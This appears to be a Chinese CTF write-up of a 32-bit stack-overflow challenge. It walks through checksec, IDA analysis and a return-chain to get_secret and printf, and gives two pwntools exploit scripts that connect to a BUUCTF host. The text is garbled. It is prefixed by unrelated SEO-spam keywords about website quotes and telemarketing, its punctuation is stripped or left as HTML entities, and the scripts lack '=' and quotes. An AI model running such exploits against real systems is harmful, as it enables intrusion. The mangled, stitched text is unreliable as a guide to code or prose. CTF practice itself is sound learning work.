企业网站报价单在招聘网站里做电话销售

企业网站报价单,在招聘网站里做电话销售,外币信用卡怎么做网站上用,百度ip地址首先checksec检查保护机制#xff1a;-32位程序-仅开启了栈不可执行保护然后使用IDA反汇编工具进行分析#xff1a;main函数中有栈溢出漏洞可利用#xff0c;左边有get_secret函数#xff0c;同时看出v4到栈底的偏移为45#xff0c;原本需要填充49字节的垃圾数据#xff…首先checksec检查保护机制-32位程序-仅开启了栈不可执行保护然后使用IDA反汇编工具进行分析main函数中有栈溢出漏洞可利用左边有get_secret函数同时看出v4到栈底的偏移为45原本需要填充49字节的垃圾数据但是最终实验只需要45个字节的垃圾数据这是get_secret函数内部这里打开了flag.txt文本文件这几行代码的作用就是将flag.txt中的内容写入到fl4g这个变量中去想就是flag了吧但是发现我们还得自己去调用printf函数将fl4g的内容打印出来才能拿到flag这里先拿到flag变量的地址0x080ECA2Dget_secret函数的地址0x080489A0在IDA中找到printf函数的地址0x0804F0A0由于栈溢出执行完printf函数后需要正常退出才能打印出flag的值所以还需用到exit函数的地址同样在IDA中拿到0x0804E660这是exp攻击脚本payload需要先执行get_secret函数将flag读取到对应的变量中后我们再将这个变量的值printf出来from pwn import * context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,26609) # 与在线环境交互。 printf_addr 0x0804F0A0 get_secret_addr 0x080489A0 flag_addr 0x080ECA2D exit_addr 0x0804E660 offset 45 payload ba*offset p32(get_secret_addr) p32(printf_addr) p32(exit_addr) p32(flag_addr) io.sendline(payload) io.interactive()在IDA中一个一个找函数的地址如果嫌太麻烦的话攻击脚本还可以这样写from pwn import * context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,26609) # 与在线环境交互。 elf ELF(./pwn) get_secret_addr elf.symbols[get_secret] printf_addr elf.symbols[printf] exit_addr elf.symbols[exit] flag_addr 0x080ECA2D offset 45 payload ba*offsetp32(get_secret_addr)p32(printf_addr)p32(exit_addr)p32(flag_addr) io.sendline(payload) io.interactive()这是运行结果-成功打印出flag